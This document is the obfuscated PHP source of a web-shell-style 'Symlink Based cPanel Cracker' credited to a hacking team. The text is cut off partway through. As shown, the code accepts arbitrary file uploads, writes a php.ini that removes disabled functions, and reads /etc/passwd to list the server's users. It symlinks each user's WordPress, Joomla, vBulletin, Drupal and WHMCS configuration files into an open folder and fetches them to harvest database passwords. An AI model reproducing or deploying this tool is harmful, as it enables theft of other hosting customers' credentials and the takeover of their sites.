Symlink Based cPanel By AnonGhost Team

1. <?php
2. $ {
3. "GLOBALS"
4. }
5. ["urgtxxu"]="password";
6. $ {
7. "GLOBALS"
8. }
9. ["tmwmkkbdjy"]="data";
10. $ {
11. "GLOBALS"
12. }
13. ["trhahkqrevw"]="connect_timeout";
14. $ {
15. "GLOBALS"
16. }
17. ["onsdfdthx"]="finalpass";
18. $ {
19. "GLOBALS"
20. }
21. ["qkfpdhf"]="target";
22. $ {
23. "GLOBALS"
24. }
25. ["wqykbxlcrzw"]="finaluser";
26. $ {
27. "GLOBALS"
28. }
29. ["iasgvgve"]="passlist";
30. $ {
31. "GLOBALS"
32. }
33. ["afrrfxkgbv"]="userl";
34. $ {
35. "GLOBALS"
36. }
37. ["cywofo"]="userlist";
38. $ {
39. "GLOBALS"
40. }
41. ["ainkhzdg"]="timeout";
42. $ {
43. "GLOBALS"
44. }
45. ["cmlkxbh"]="cracked";
46. $ {
47. "GLOBALS"
48. }
49. ["jtxbycj"]="attack";
50. $ {
51. "GLOBALS"
52. }
53. ["avvdiennau"]="passl";
54. $ {
55. "GLOBALS"
56. }
57. ["pkxusn"]="rt";
58. $ {
59. "GLOBALS"
60. }
61. ["mpzmgvjrk"]="pf";
62. $ {
63. "GLOBALS"
64. }
65. ["frnguil"]="d";
66. $ {
67. "GLOBALS"
68. }
69. ["oqvsusmuih"]="users";
70. $ {
71. "GLOBALS"
72. }
73. ["nheadbdqjtu"]="db";
74. $ {
75. "GLOBALS"
76. }
77. ["jqbdqptiz"]="pass";
78. $ {
79. "GLOBALS"
80. }
81. ["dseeueq"]="dbp";
82. $ {
83. "GLOBALS"
84. }
85. ["smposrbewu"]="uxl";
86. $ {
87. "GLOBALS"
88. }
89. ["ytygxi"]="result";
90. $ {
91. "GLOBALS"
92. }
93. ["clcexgoc"]="ch";
94. $ {
95. "GLOBALS"
96. }
97. ["ghpkiod"]="co";
98. $ {
99. "GLOBALS"
100. }
101. ["tfufwtkggg"]="usersss";
102. $ {
103. "GLOBALS"
104. }
105. ["xqjsjx"]="ffile";
106. $ {
107. "GLOBALS"
108. }
109. ["pmtirjsjc"]="ar1";
110. $ {
111. "GLOBALS"
112. }
113. ["kerydmcjzyb"]="ar";
114. $ {
115. "GLOBALS"
116. }
117. ["jlqnbkqdiu"]="marqueurFinLien";
118. $ {
119. "GLOBALS"
120. }
121. ["ggmdrvtscl"]="ar0";
122. $ {
123. "GLOBALS"
124. }
125. ["cphxtevrvxlx"]="uss";
126. $ {
127. "GLOBALS"
128. }
129. ["nfkxmppan"]="us";
130. $ {
131. "GLOBALS"
132. }
133. ["fdrsjdqvvfa"]="usr";
134. $ {
135. "GLOBALS"
136. }
137. ["wwtfekdukc"]="f";
138. $ {
139. "GLOBALS"
140. }
141. ["mppsifb"]="user";
142. $ {
143. "GLOBALS"
144. }
145. ["tnsglnuwozs"]="str";
146. $ {
147. "GLOBALS"
148. }
149. ["estpmxtrsymy"]="link";
150. $ {
151. "GLOBALS"
152. }
153. ["ukikdh"]="r";
154. $pfsmvyqq="head";
155. $ {
156. "GLOBALS"
157. }
158. ["puhmppjk"]="head";
159. $ {
160. $ {
161. "GLOBALS"
162. }
163. ["puhmppjk"]
164. }
165. ="
166. <html>
167. <head>
168. <link rel=\"stylesheet\" href=\"http://www.w32.info/2001/04/xmldsigmore\">
169. </script>
170. <title>--==[[Symlink Based Cpanel Cracker By Team AnonGhost Team]]==--</title>
171. <link rel=\"shortcut icon\" href=\"http://i.imgur.com/g7VNhrD.gif\" />
172. <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
173. <STYLE>
174. body {
175. font-family: Tahoma
176. }
177. tr {
178. BORDER: dashed 1px #333;
179. color: #FFF;
180. }
181. td {
182. BORDER: dashed 1px #333;
183. color: #FFF;
184. }
185. .table1 {
186. BORDER: 0px Black;
187. BACKGROUND-COLOR: Black;
188. color: #FFF;
189. }
190. .td1 {
191. BORDER: 0px;
192. BORDER-COLOR: #333333;
193. font: 7pt Verdana;
194. color: Green;
195. }
196. .tr1 {
197. BORDER: 0px;
198. BORDER-COLOR: #333333;
199. color: #FFF;
200. }
201. table {
202. BORDER: dashed 1px #333;
203. BORDER-COLOR: #333333;
204. BACKGROUND-COLOR: Black;
205. color: #FFF;
206. }
207. input {
208. border : solid 3px ;
209. border-color : #333;
210. BACKGROUND-COLOR: white;
211. font: 11pt Verdana;
212. color: #333;
213. }
214. select {
215. BORDER-RIGHT: Black 1px solid;
216. BORDER-TOP: #DF0000 1px solid;
217. BORDER-LEFT: #DF0000 1px solid;
218. BORDER-BOTTOM: Black 1px solid;
219. BORDER-color: #FFF;
220. BACKGROUND-COLOR: Black;
221. font: 8pt Verdana;
222. color: Red;
223. }
224. submit {
225. BORDER: buttonhighlight 2px outset;
226. BACKGROUND-COLOR: Black;
227. width: 30%;
228. color: #FFF;
229. }
230. textarea {
231. border : dashed 1px #333;
232. BACKGROUND-COLOR: Black;
233. font: Fixedsys bold;
234. color: #999;
235. }
236. BODY {
237. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
238. margin: 1px;
239. color: Red;
240. background-color: Black;
241. }
242. .main {
243. margin : -287px 0px 0px -490px;
244. BORDER: dashed 1px #333;
245. BORDER-COLOR: #333333;
246. }
247. .tt {
248. background-color: Black;
249. }
250. A:link {
251. COLOR: White; TEXT-DECORATION: none
252. }
253. A:visited {
254. COLOR: White; TEXT-DECORATION: none
255. }
256. A:hover {
257. color: Red; TEXT-DECORATION: none
258. }
259. A:active {
260. color: Red; TEXT-DECORATION: none
261. }
262. </STYLE>
263. <script language='javascript'>
264. function hide_div(id)
265. {
266. document.getElementById(id).style.display = 'none';
267. document.cookie=id+'=0;';
268. }
269. function show_div(id)
270. {
271. document.getElementById(id).style.display = 'block';
272. document.cookie=id+'=1;';
273. }
274. function change_divst(id)
275. {
276. if (document.getElementById(id).style.display == 'none')
277. show_div(id);
278. else
279. hide_div(id);
280. }
281. </script>";
282. echo "<html>
283. <head>
284. ";
285. echo$ {
286. $pfsmvyqq
287. }
288. ;
289. echo"
290. <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"tb1\" >
291. <td width=\"100%\" align=center valign=\"top\" rowspan=\"1\">
292. <font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b>--==[[ Symlink Based</font><font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b> cPanel Cracker By</font><font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b> AnonGhost Team ]]==--</font> <div class=\"hedr\">
293. <td height=\"10\" align=\"left\" class=\"td1\"></td></tr><tr><td
294. width=\"100%\" align=\"center\" valign=\"top\" rowspan=\"1\"><font
295. color=\"red\" face=\"comic sans ms\"size=\"1\"><b>
296. <font color=#ff0000>
297. ####################################################</font><font color=#ff0>#####################################################</font><font color=#00ff00>####################################################</font><br><br><font color=red>
298. ####################################################</font><font color=yellow>#####################################################</font><font color=lime>####################################################</font>
299. </table>
300. </table>
301. <table width=\"100%\" border=\"2\">
302. <tr>
303. <td width=\"10%\" align=\"center\">
304. <blink><font color=\"red\"><code>Greetz To : </code></font></blink>
305. </td>
306. <td width=\"90%\">
307. <font color=\"lime\">
308. <marquee><code>Cutira Rahayu (Mygirlfriend) | AnonGhost | INDISHELL | ZHC | Mauritania Hacker Team | Algerian To The Core | GCE College ke DON | Local Root INDISHELL | DON3 | All Member AnonGhost | All Member INDISHELL | All Member Algerian To The Core</code></marquee>
309. </font>
310. </td>
311. </tr>
312. </table>
313. <br></font></div><div align=center><table width=50%><font color=\"#FF0000\" font size=5>r3c0d3d by : <a href=\"http://www.facebook.com/K4C3.undetected2\"/><font color=\"#00ff00\" font size=5>K4C3 Undetected<a/></font></table>
314. ";
315.  
316. (@copy($_FILES['f']['tmp_name'], $_FILES['f']['name']));
317. echo "<body bgcolor=black><h3 style=\"text-align:center\"><font color=red size=2 face=\"comic sans ms\">
318. <form method=post>
319. <input type=submit name=ini value=\"Generate PHP.ini\" /></form>
320. ";
321. if(isset($_POST["ini"])) {
322. $tuyukblaw="rr";
323. $ {
324. "GLOBALS"
325. }
326. ["vpmwuoumuy"]="rr";
327. $zcbtdlw="r";
328. $ {
329. $zcbtdlw
330. }
331. =fopen("php.ini","w");
332. $ {
333. "GLOBALS"
334. }
335. ["bkdfntbucf"]="link";
336. $ {
337. $tuyukblaw
338. }
339. =" disable_functions=none ";
340. fwrite($ {
341. $ {
342. "GLOBALS"
343. }
344. ["ukikdh"]
345. }
346. ,$ {
347. $ {
348. "GLOBALS"
349. }
350. ["vpmwuoumuy"]
351. }
352. );
353. $ {
354. $ {
355. "GLOBALS"
356. }
357. ["bkdfntbucf"]
358. }
359. ="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
360. echo$ {
361. $ {
362. "GLOBALS"
363. }
364. ["estpmxtrsymy"]
365. }
366. ;
367. }
368. $ {
369. "GLOBALS"
370. }
371. ["fhuebeob"]="userl";
372. echo "<p>\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking ///////////////////////
373. ";
374. echo "<form method=post>
375. <input type=submit name=\"usre\" value=\"click to Extract usernames and mass symlink\" /></form>
376. ";
377. if(isset($_POST["usre"])) {
378. $ {
379. "GLOBALS"
380. }
381. ["nmgxpcpfqbz"]="users";
382. $ {
383. "GLOBALS"
384. }
385. ["ooteonyawj"]="users";
386. $ulpomnmkws="user";
387. echo "<form method=post>
388. <textarea rows=10 cols=30 name=user>";
389. $ {
390. $ {
391. "GLOBALS"
392. }
393. ["ooteonyawj"]
394. }
395. =file("/etc/passwd");
396. foreach($ {
397. $ {
398. "GLOBALS"
399. }
400. ["nmgxpcpfqbz"]
401. }
402. as$ {
403. $ulpomnmkws
404. }
405. ) {
406. $ {
407. $ {
408. "GLOBALS"
409. }
410. ["tnsglnuwozs"]
411. }
412. =explode(":",$ {
413. $ {
414. "GLOBALS"
415. }
416. ["mppsifb"]
417. }
418. );
419. $ {
420. "GLOBALS"
421. }
422. ["withojrurut"]="str";
423. echo$ {
424. $ {
425. "GLOBALS"
426. }
427. ["withojrurut"]
428. }
429. [0]."
430. ";
431. }
432. echo "</textarea><br><br>
433. <input type=submit name=su value=\"Kill Them\" /></form>
434. ";
435. }
436. error_reporting(0);
437. echo"<font color=red size=2 face=\"comic sans ms\">";
438. if(isset($_POST["su"])) {
439. $tpllhfwoe="r";
440. $ {
441. "GLOBALS"
442. }
443. ["lyvnzejugsvu"]="uss";
444. $tcorpxovnr="dir";
445. $ {
446. "GLOBALS"
447. }
448. ["kveejcvk"]="f";
449. $ {
450. "GLOBALS"
451. }
452. ["rueiegknmuns"]="consym";
453. $ {
454. $tcorpxovnr
455. }
456. =mkdir("kace",0777);
457. $ {
458. $tpllhfwoe
459. }
460. =" Options all
461. DirectoryIndex kace.html
462. Require None
463. Satisfy Any";
464. $ {
465. $ {
466. "GLOBALS"
467. }
468. ["wwtfekdukc"]
469. }
470. =fopen("kace/.htaccess","w");
471. fwrite($ {
472. $ {
473. "GLOBALS"
474. }
475. ["kveejcvk"]
476. }
477. ,$ {
478. $ {
479. "GLOBALS"
480. }
481. ["ukikdh"]
482. }
483. );
484. $ {
485. $ {
486. "GLOBALS"
487. }
488. ["rueiegknmuns"]
489. }
490. ="<a href=kace/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
491. echo"<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
492. $ {
493. $ {
494. "GLOBALS"
495. }
496. ["fdrsjdqvvfa"]
497. }
498. =explode("
499. ",$_POST["user"]);
500. foreach($ {
501. $ {
502. "GLOBALS"
503. }
504. ["fdrsjdqvvfa"]
505. }
506. as$ {
507. $ {
508. "GLOBALS"
509. }
510. ["lyvnzejugsvu"]
511. }
512. ) {
513. $ {
514. "GLOBALS"
515. }
516. ["ykxuxbudxwd"]="us";
517. $nnfijewaq="us";
518. $ {
519. $ {
520. "GLOBALS"
521. }
522. ["nfkxmppan"]
523. }
524. =trim($ {
525. $ {
526. "GLOBALS"
527. }
528. ["cphxtevrvxlx"]
529. }
530. );
531. $ {
532. "GLOBALS"
533. }
534. ["hqkbkbp"]="r";
535. $ {
536. "GLOBALS"
537. }
538. ["tjipdfjxt"]="us";
539. $digicnsr="r";
540. $ilinfsl="us";
541. $nttomrctg="r";
542. $wtsjldlfks="r";
543. $ {
544. $wtsjldlfks
545. }
546. ="kace/";
547. $ {
548. "GLOBALS"
549. }
550. ["siqthtb"]="us";
551. $emvqckjm="us";
552. symlink("/home/".$ {
553. $ {
554. "GLOBALS"
555. }
556. ["nfkxmppan"]
557. }
558. ."/public_html/wp-config.php",$ {
559. $ {
560. "GLOBALS"
561. }
562. ["ukikdh"]
563. }
564. .$ {
565. $ {
566. "GLOBALS"
567. }
568. ["nfkxmppan"]
569. }
570. ."..wp-config");
571. $vbdqstdn="us";
572. symlink("/home/".$ {
573. $ {
574. "GLOBALS"
575. }
576. ["nfkxmppan"]
577. }
578. ."/public_html/wordpress/wp-config.php",$ {
579. $ {
580. "GLOBALS"
581. }
582. ["ukikdh"]
583. }
584. .$ {
585. $ {
586. "GLOBALS"
587. }
588. ["nfkxmppan"]
589. }
590. ."..word-wp");
591. $ {
592. "GLOBALS"
593. }
594. ["oeqavelcrca"]="us";
595. $ {
596. "GLOBALS"
597. }
598. ["evgapi"]="r";
599. $fuepnu="us";
600. $ {
601. "GLOBALS"
602. }
603. ["ciedzzvonvs"]="us";
604. $ywjdhaoepls="r";
605. $ {
606. "GLOBALS"
607. }
608. ["seuqbf"]="us";
609. $ {
610. "GLOBALS"
611. }
612. ["icatsvxz"]="us";
613. $jgueznl="r";
614. $bxhsmqekesfp="us";
615. $osqubeuk="us";
616. $yhskzomzcmj="us";
617. $ {
618. "GLOBALS"
619. }
620. ["iqlxhlploe"]="r";
621. $qshqeltig="us";
622. symlink("/home/".$ {
623. $ {
624. "GLOBALS"
625. }
626. ["seuqbf"]
627. }
628. ."/public_html/blog/wp-config.php",$ {
629. $ {
630. "GLOBALS"
631. }
632. ["ukikdh"]
633. }
634. .$ {
635. $ {
636. "GLOBALS"
637. }
638. ["nfkxmppan"]
639. }
640. ."..wpblog");
641. $ynyawmsbu="r";
642. $upygzgud="r";
643. symlink("/home/".$ {
644. $vbdqstdn
645. }
646. ."/public_html/configuration.php",$ {
647. $ {
648. "GLOBALS"
649. }
650. ["iqlxhlploe"]
651. }
652. .$ {
653. $ {
654. "GLOBALS"
655. }
656. ["nfkxmppan"]
657. }
658. ."..joomla-or-whmcs");
659. symlink("/home/".$ {
660. $ {
661. "GLOBALS"
662. }
663. ["nfkxmppan"]
664. }
665. ."/public_html/joomla/configuration.php",$ {
666. $ {
667. "GLOBALS"
668. }
669. ["evgapi"]
670. }
671. .$ {
672. $ {
673. "GLOBALS"
674. }
675. ["siqthtb"]
676. }
677. ."..joomla");
678. $xmytnoqtu="us";
679. $ {
680. "GLOBALS"
681. }
682. ["fphgbuds"]="us";
683. $ {
684. "GLOBALS"
685. }
686. ["psapxabo"]="us";
687. $ {
688. "GLOBALS"
689. }
690. ["fmwcjqjyryn"]="us";
691. $ {
692. "GLOBALS"
693. }
694. ["uhxnnsjox"]="us";
695. $ {
696. "GLOBALS"
697. }
698. ["vtrdskbnl"]="r";
699. symlink("/home/".$ {
700. $ {
701. "GLOBALS"
702. }
703. ["nfkxmppan"]
704. }
705. ."/public_html/vb/includes/config.php",$ {
706. $nttomrctg
707. }
708. .$ {
709. $ {
710. "GLOBALS"
711. }
712. ["nfkxmppan"]
713. }
714. ."..vbinc");
715. symlink("/home/".$ {
716. $ {
717. "GLOBALS"
718. }
719. ["uhxnnsjox"]
720. }
721. ."/public_html/includes/config.php",$ {
722. $ {
723. "GLOBALS"
724. }
725. ["ukikdh"]
726. }
727. .$ {
728. $ {
729. "GLOBALS"
730. }
731. ["nfkxmppan"]
732. }
733. ."..vb");
734. $ {
735. "GLOBALS"
736. }
737. ["wnvbzxp"]="us";
738. $ {
739. "GLOBALS"
740. }
741. ["hqilsywq"]="r";
742. symlink("/home/".$ {
743. $ {
744. "GLOBALS"
745. }
746. ["nfkxmppan"]
747. }
748. ."/public_html/conf_global.php",$ {
749. $ {
750. "GLOBALS"
751. }
752. ["ukikdh"]
753. }
754. .$ {
755. $ {
756. "GLOBALS"
757. }
758. ["nfkxmppan"]
759. }
760. ."..conf_global");
761. symlink("/home/".$ {
762. $qshqeltig
763. }
764. ."/public_html/inc/config.php",$ {
765. $ {
766. "GLOBALS"
767. }
768. ["ukikdh"]
769. }
770. .$ {
771. $ {
772. "GLOBALS"
773. }
774. ["tjipdfjxt"]
775. }
776. ."..inc");
777. symlink("/home/".$ {
778. $ {
779. "GLOBALS"
780. }
781. ["fphgbuds"]
782. }
783. ."/public_html/config.php",$ {
784. $ {
785. "GLOBALS"
786. }
787. ["ukikdh"]
788. }
789. .$ {
790. $xmytnoqtu
791. }
792. ."..config");
793. symlink("/home/".$ {
794. $ {
795. "GLOBALS"
796. }
797. ["nfkxmppan"]
798. }
799. ."/public_html/Settings.php",$ {
800. $ywjdhaoepls
801. }
802. .$ {
803. $ {
804. "GLOBALS"
805. }
806. ["nfkxmppan"]
807. }
808. ."..Settings");
809. symlink("/home/".$ {
810. $ {
811. "GLOBALS"
812. }
813. ["oeqavelcrca"]
814. }
815. ."/public_html/sites/default/settings.php",$ {
816. $digicnsr
817. }
818. .$ {
819. $ {
820. "GLOBALS"
821. }
822. ["wnvbzxp"]
823. }
824. ."..sites");
825. symlink("/home/".$ {
826. $ilinfsl
827. }
828. ."/public_html/whm/configuration.php",$ {
829. $ {
830. "GLOBALS"
831. }
832. ["ukikdh"]
833. }
834. .$ {
835. $emvqckjm
836. }
837. ."..whm");
838. $qqfekrji="us";
839. $ {
840. "GLOBALS"
841. }
842. ["twjpjgbpqc"]="r";
843. $ {
844. "GLOBALS"
845. }
846. ["sxqkxmmdzq"]="us";
847. symlink("/home/".$ {
848. $ {
849. "GLOBALS"
850. }
851. ["nfkxmppan"]
852. }
853. ."/public_html/whmcs/configuration.php",$ {
854. $ {
855. "GLOBALS"
856. }
857. ["ukikdh"]
858. }
859. .$ {
860. $osqubeuk
861. }
862. ."..whmcs");
863. $cbuolpszvmwl="us";
864. $ {
865. "GLOBALS"
866. }
867. ["qgnhbmkjk"]="us";
868. symlink("/home/".$ {
869. $cbuolpszvmwl
870. }
871. ."/public_html/support/configuration.php",$ {
872. $ {
873. "GLOBALS"
874. }
875. ["ukikdh"]
876. }
877. .$ {
878. $ {
879. "GLOBALS"
880. }
881. ["nfkxmppan"]
882. }
883. ."..supporwhmcs");
884. symlink("/home/".$ {
885. $ {
886. "GLOBALS"
887. }
888. ["sxqkxmmdzq"]
889. }
890. ."/public_html/whmc/WHM/configuration.php",$ {
891. $ {
892. "GLOBALS"
893. }
894. ["ukikdh"]
895. }
896. .$ {
897. $ {
898. "GLOBALS"
899. }
900. ["nfkxmppan"]
901. }
902. ."..WHM");
903. symlink("/home/".$ {
904. $ {
905. "GLOBALS"
906. }
907. ["nfkxmppan"]
908. }
909. ."/public_html/whm/WHMCS/configuration.php",$ {
910. $ {
911. "GLOBALS"
912. }
913. ["twjpjgbpqc"]
914. }
915. .$ {
916. $ {
917. "GLOBALS"
918. }
919. ["fmwcjqjyryn"]
920. }
921. ."..whmc");
922. symlink("/home/".$ {
923. $fuepnu
924. }
925. ."/public_html/whm/whmcs/configuration.php",$ {
926. $ {
927. "GLOBALS"
928. }
929. ["vtrdskbnl"]
930. }
931. .$ {
932. $ {
933. "GLOBALS"
934. }
935. ["ciedzzvonvs"]
936. }
937. ."..WHMcs");
938. symlink("/home/".$ {
939. $ {
940. "GLOBALS"
941. }
942. ["nfkxmppan"]
943. }
944. ."/public_html/support/configuration.php",$ {
945. $jgueznl
946. }
947. .$ {
948. $ {
949. "GLOBALS"
950. }
951. ["nfkxmppan"]
952. }
953. ."..whmcsupp");
954. symlink("/home/".$ {
955. $qqfekrji
956. }
957. ."/public_html/clients/configuration.php",$ {
958. $ {
959. "GLOBALS"
960. }
961. ["ukikdh"]
962. }
963. .$ {
964. $ {
965. "GLOBALS"
966. }
967. ["nfkxmppan"]
968. }
969. ."..whmcs-cli");
970. symlink("/home/".$ {
971. $ {
972. "GLOBALS"
973. }
974. ["ykxuxbudxwd"]
975. }
976. ."/public_html/client/configuration.php",$ {
977. $ {
978. "GLOBALS"
979. }
980. ["hqkbkbp"]
981. }
982. .$ {
983. $ {
984. "GLOBALS"
985. }
986. ["icatsvxz"]
987. }
988. ."..whmcs-cl");
989. symlink("/home/".$ {
990. $ {
991. "GLOBALS"
992. }
993. ["nfkxmppan"]
994. }
995. ."/public_html/clientes/configuration.php",$ {
996. $ynyawmsbu
997. }
998. .$ {
999. $bxhsmqekesfp
1000. }
1001. ."..whmcs-CL");
1002. symlink("/home/".$ {
1003. $ {
1004. "GLOBALS"
1005. }
1006. ["psapxabo"]
1007. }
1008. ."/public_html/cliente/configuration.php",$ {
1009. $ {
1010. "GLOBALS"
1011. }
1012. ["ukikdh"]
1013. }
1014. .$ {
1015. $ {
1016. "GLOBALS"
1017. }
1018. ["nfkxmppan"]
1019. }
1020. ."..whmcs-Cl");
1021. symlink("/home/".$ {
1022. $nnfijewaq
1023. }
1024. ."/public_html/clientsupport/configuration.php",$ {
1025. $ {
1026. "GLOBALS"
1027. }
1028. ["hqilsywq"]
1029. }
1030. .$ {
1031. $ {
1032. "GLOBALS"
1033. }
1034. ["nfkxmppan"]
1035. }
1036. ."..whmcs-csup");
1037. symlink("/home/".$ {
1038. $yhskzomzcmj
1039. }
1040. ."/public_html/billing/configuration.php",$ {
1041. $upygzgud
1042. }
1043. .$ {
1044. $ {
1045. "GLOBALS"
1046. }
1047. ["qgnhbmkjk"]
1048. }
1049. ."..whmcs-bill");
1050. symlink("/home/".$ {
1051. $ {
1052. "GLOBALS"
1053. }
1054. ["nfkxmppan"]
1055. }
1056. ."/public_html/admin/config.php",$ {
1057. $ {
1058. "GLOBALS"
1059. }
1060. ["ukikdh"]
1061. }
1062. .$ {
1063. $ {
1064. "GLOBALS"
1065. }
1066. ["nfkxmppan"]
1067. }
1068. ."..admin-conf");
1069. }
1070. }
1071. echo "
1072. <form method=post>
1073. <input type=submit name=sm value=\"start grabbing passwords from configuration files\"></form>
1074. ";
1075. $ {
1076. "GLOBALS"
1077. }
1078. ["ytidfmauvywq"]="target";
1079. error_reporting(0);
1080. set_time_limit(0);
1081. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) {
1082. $olntrvw="text";
1083. $khrhbgxcul="ar";
1084. $ {
1085. "GLOBALS"
1086. }
1087. ["agilmrcy"]="ar1";
1088. $ {
1089. "GLOBALS"
1090. }
1091. ["dbdhjgpvvl"]="marqueurDebutLien";
1092. $ {
1093. $ {
1094. "GLOBALS"
1095. }
1096. ["ggmdrvtscl"]
1097. }
1098. =explode($ {
1099. $ {
1100. "GLOBALS"
1101. }
1102. ["dbdhjgpvvl"]
1103. }
1104. ,$ {
1105. $olntrvw
1106. }
1107. );
1108. $ {
1109. $ {
1110. "GLOBALS"
1111. }
1112. ["agilmrcy"]
1113. }
1114. =explode($ {
1115. $ {
1116. "GLOBALS"
1117. }
1118. ["jlqnbkqdiu"]
1119. }
1120. ,$ {
1121. $ {
1122. "GLOBALS"
1123. }
1124. ["ggmdrvtscl"]
1125. }
1126. [1]);
1127. $ {
1128. $ {
1129. "GLOBALS"
1130. }
1131. ["kerydmcjzyb"]
1132. }
1133. =trim($ {
1134. $ {
1135. "GLOBALS"
1136. }
1137. ["pmtirjsjc"]
1138. }
1139. [0]);
1140. return$ {
1141. $khrhbgxcul
1142. }
1143. ;
1144. }
1145. if(isset($_POST["sm"])) {
1146. echo"U can see the the Passowrd in here :p";
1147. $ {
1148. "GLOBALS"
1149. }
1150. ["svhyqvbhq"]="r";
1151. $ {
1152. $ {
1153. "GLOBALS"
1154. }
1155. ["xqjsjx"]
1156. }
1157. =fopen("r.txt","a+");
1158. $ {
1159. "GLOBALS"
1160. }
1161. ["nhifbiqs"]="user";
1162. $ {
1163. "GLOBALS"
1164. }
1165. ["ztuunpxyevyv"]="re";
1166. $ {
1167. $ {
1168. "GLOBALS"
1169. }
1170. ["svhyqvbhq"]
1171. }
1172. ="http://".$_SERVER["SERVER_NAME"].dirname($_SERVER["SCRIPT_NAME"])."/kace/";
1173. $nsznhpufgc="confi";
1174. $ {
1175. $ {
1176. "GLOBALS"
1177. }
1178. ["ztuunpxyevyv"]
1179. }
1180. =$ {
1181. $ {
1182. "GLOBALS"
1183. }
1184. ["ukikdh"]
1185. }
1186. ;
1187. $oqjgrkmwi="users";
1188. $ {
1189. "GLOBALS"
1190. }
1191. ["hrwgcxni"]="users";
1192. $ {
1193. $nsznhpufgc
1194. }
1195. =array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
1196. $ {
1197. $ {
1198. "GLOBALS"
1199. }
1200. ["hrwgcxni"]
1201. }
1202. =file("/etc/passwd");
1203. foreach($ {
1204. $oqjgrkmwi
1205. }
1206. as$ {
1207. $ {
1208. "GLOBALS"
1209. }
1210. ["nhifbiqs"]
1211. }
1212. ) {
1213. $ {
1214. "GLOBALS"
1215. }
1216. ["lffiivehuw"]="str";
1217. $ {
1218. "GLOBALS"
1219. }
1220. ["fdwmnihfmm"]="str";
1221. $qdscoy="confi";
1222. $ {
1223. "GLOBALS"
1224. }
1225. ["qdsgggmv"]="user";
1226. $ {
1227. $ {
1228. "GLOBALS"
1229. }
1230. ["fdwmnihfmm"]
1231. }
1232. =explode(":",$ {
1233. $ {
1234. "GLOBALS"
1235. }
1236. ["qdsgggmv"]
1237. }
1238. );
1239. $ {
1240. $ {
1241. "GLOBALS"
1242. }
1243. ["tfufwtkggg"]
1244. }
1245. =$ {
1246. $ {
1247. "GLOBALS"
1248. }
1249. ["lffiivehuw"]
1250. }
1251. [0];
1252. foreach($ {
1253. $qdscoy
1254. }
1255. as$ {
1256. $ {
1257. "GLOBALS"
1258. }
1259. ["ghpkiod"]
1260. }
1261. ) {
1262. $lqovtogmdro="ch";
1263. $pohpfdtmti="re";
1264. $ {
1265. "GLOBALS"
1266. }
1267. ["nchjukvvqit"]="ch";
1268. $hehrkezdpk="uxl";
1269. $ {
1270. "GLOBALS"
1271. }
1272. ["pemxmrsh"]="uurl";
1273. $ptrckqlsicw="uxl";
1274. $wzhjhoquw="uel";
1275. $nmkswatkkt="co";
1276. $ghknfyflg="uurl";
1277. $ {
1278. "GLOBALS"
1279. }
1280. ["vxtiswnt"]="uel";
1281. $fmcdexbf="ch";
1282. $oebhbtqi="uxl";
1283. $nkpoepwpdqd="result";
1284. $mbpipeu="uxl";
1285. $ {
1286. $ghknfyflg
1287. }
1288. =$ {
1289. $pohpfdtmti
1290. }
1291. .$ {
1292. $ {
1293. "GLOBALS"
1294. }
1295. ["tfufwtkggg"]
1296. }
1297. .$ {
1298. $nmkswatkkt
1299. }
1300. ;
1301. $anhgzfy="ch";
1302. $ {
1303. $ {
1304. "GLOBALS"
1305. }
1306. ["vxtiswnt"]
1307. }
1308. =$ {
1309. $ {
1310. "GLOBALS"
1311. }
1312. ["pemxmrsh"]
1313. }
1314. ;
1315. $ {
1316. $ {
1317. "GLOBALS"
1318. }
1319. ["clcexgoc"]
1320. }
1321. =curl_init();
1322. $ {
1323. "GLOBALS"
1324. }
1325. ["wppiyrcdbbn"]="ch";
1326. $kgbbmpotw="uxl";
1327. curl_setopt($ {
1328. $ {
1329. "GLOBALS"
1330. }
1331. ["clcexgoc"]
1332. }
1333. ,CURLOPT_URL,$ {
1334. $wzhjhoquw
1335. }
1336. );
1337. curl_setopt($ {
1338. $ {
1339. "GLOBALS"
1340. }
1341. ["nchjukvvqit"]
1342. }
1343. ,CURLOPT_HEADER,1);
1344. curl_setopt($ {
1345. $anhgzfy
1346. }
1347. ,CURLOPT_RETURNTRANSFER,1);
1348. $gqfsexakg="ch";
1349. curl_setopt($ {
1350. $gqfsexakg
1351. }
1352. ,CURLOPT_CONNECTTIMEOUT,5);
1353. $wgmhnq="uxl";
1354. $ {
1355. "GLOBALS"
1356. }
1357. ["jpvfshlwt"]="uxl";
1358. $cpyvvnpbpbc="uxl";
1359. curl_setopt($ {
1360. $ {
1361. "GLOBALS"
1362. }
1363. ["wppiyrcdbbn"]
1364. }
1365. ,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8");
1366. $ {
1367. $ {
1368. "GLOBALS"
1369. }
1370. ["ytygxi"]
1371. }
1372. ["EXE"]=curl_exec($ {
1373. $fmcdexbf
1374. }
1375. );
1376. curl_close($ {
1377. $lqovtogmdro
1378. }
1379. );
1380. $ {
1381. $ {
1382. "GLOBALS"
1383. }
1384. ["smposrbewu"]
1385. }
1386. =$ {
1387. $nkpoepwpdqd
1388. }
1389. ["EXE"];
1390. $dsojfl="uxl";
1391. $ {
1392. "GLOBALS"
1393. }
1394. ["glpswt"]="uxl";
1395. if($ {
1396. $kgbbmpotw
1397. }
